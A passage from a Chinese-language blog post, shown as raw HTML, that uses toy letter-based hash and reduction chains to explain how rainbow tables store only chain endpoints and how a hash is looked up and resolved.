<td style="width: 21pt;" width="28"><span style="font-size: large;"><b><span style="color: red;">J</span></b></span></td>
</tr>
<tr style="height: 50px;">
<td><span style="font-size: large;"><b><span style="color: red;">K</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hk</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>E</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>He</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>Q</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hq</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>V</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hv</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>W</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hw</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>T</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Ht</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>B</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hb</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td><span style="font-size: large;"><b><span style="color: red;">L</span></b></span></td>
</tr>
<tr style="height: 50px;">
<td><span style="font-size: large;"><b><span style="color: red;">P</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hp</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>U</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hu</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>H</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hh</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>D</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hd</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>O</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Ho</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>K</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hk</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>E</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>He</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td><span style="font-size: large;"><b><span style="color: red;">Q</span></b></span></td>
</tr>
</tbody></table>
<div style="margin: -8px 4px 8px 12px;">
<span style="color: #741b47;"><b>~~底下還有,省略~~</b></span></div>
<div style="margin-bottom: 8px; text-indent: 2em;">
彩虹表最後只會儲存每條鏈的頭尾,即上面兩張表紅字部分,這樣就可以不必儲存所有對照表,而達到節省空間 的目的。那麼在破解時,要如何應用彩虹表呢?假設我們拿到一組雜湊值<b>Hw</b>,利用<b>三階</b>的彩虹表破解:</div>
<div style="margin-bottom: 8px; margin-top: -16px;">
<ol>
<li><b>Hw</b>經<span style="color: #990000;">歸約函式</span>得到<b>T</b>。</li>
<li>比對每條彩虹鍵的尾端,在第三條鏈找到<b>T</b>,因而得知該鏈的頭是<b>Q</b></li>
<li>用<b>Q</b>計算得<span style="color: #38761d;">雜湊</span>值<b>Hq</b>,<b><span style="color: #990000;">Hq≠Hw</span></b></li>
<li>將<b>Hq</b>送<span style="color: #990000;">歸約函式</span>計算得<b>V</b>,用<b>V</b>計算得<span style="color: #38761d;">雜湊</span>值<b>Hv</b>,<span style="color: #990000;"><b>Hv≠Hw</b></span></li>
<li>將<b>Hv</b>送<span style="color: #990000;">歸約函式</span>計算得<b>W</b>,用W計算得<span style="color: #38761d;">雜湊</span>值<b>Hw</b>,<span style="color: blue;"><b>Hw=Hw</b></span>,所以求得答案為<span style="color: blue;"><b>W</b></span></li>
</ol>
</div>
<div style="margin-top: 8px;">
同樣的,若用<b>七階</b>彩虹表破解:</div>
<div style="margin-top: -16px;">
<ol>
<li><b>Hw</b>經<span style="color: #990000;">歸約函式</span>得到<b>T</b>。</li>
<li>用<b>T</b>比對每條彩虹鍵的尾端,都沒有找到<b>T</b></li>
<li>將<b>T</b><span style="color: #38761d;">雜湊</span>得<b>Ht</b>,再將Ht<span style="color: #990000;">歸約</span>得<b>B</b></li>
<li>用<b>B</b> 比對每條彩虹鍵的尾端,都沒有找到<b>B</b></li>
<li>將<b>B</b><span style="color: #38761d;">雜湊</span>得<b>Hb</b>,再將<b>Hb</b><span style="color: #990000;">歸約</span>得<b>L</b></li>
<li>用<b>L</b>比對每條彩虹鍵的尾端,在第二條鏈找到<b>L</b>,因而得知該鏈的頭是<b>K</b> </li>
<li>用<b>K</b>計算得<span style="color: #38761d;">雜湊</span>值<b>Hk</b>,<span style="color: #990000;"><b>Hk≠Hw</b></span></li>
<li>將<b>Hk</b>送<span style="color: #990000;">歸約函式</span>計算得<b>E</b>,用<b>E</b>計算得<span style="color: #38761d;">雜湊</span>值<b>He</b>,<span style="color: #990000;"><b>He≠Hw</b></span></li>
<li>將<b>He</b>送<span style="color: #990000;">歸約函式</span>計算得<b>Q</b>,用<b>Q</b>計算得<span style="color: #38761d;">雜湊</span>值<b>Hq</b>,<span style="color: #990000;"><b>Hq≠Hw</b></span></li>
<li>將<b>Hq</b>送<span style="color: #990000;">歸約函式</span>計算得<b>V</b>,用<b>V</b>計算得<span style="color: #38761d;">雜湊</span>值<b>Hv</b>,<span style="color: #990000;"><b>Hv≠Hw</b></span></li>
<li>將<b>Hv</b>送<span style="color: #990000;">歸約函式</span>計算得<b>W</b>,用<b>W</b>計算得<span style="color: #38761d;">雜湊</span>值<b>Hw</b>,<span style="color: blue;"><b>Hw=Hw </b></span>,所以求得答案為<span style="color: blue;"><b>W</b></span></li>
</ol>
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
如果不巧拿到<b>Hy</b>的雜湊值呢?會重複上述步驟1 到2,如果<b>七階</b>鏈就<b>重複七回</b>、<b>三階鏈</b>就<b>重複三回</b>,如果都沒有找到相符的尾值,就表示該雜湊值在目前的彩虹表是解不出來的。</div>
<div style="margin-bottom: 8px;">
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
上述是彩虹表大略的工作原理,終於知道它並<b><span style="color: #990000;">不是</span></b>完全的<b>明文-雜湊</b>對照表。</div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com2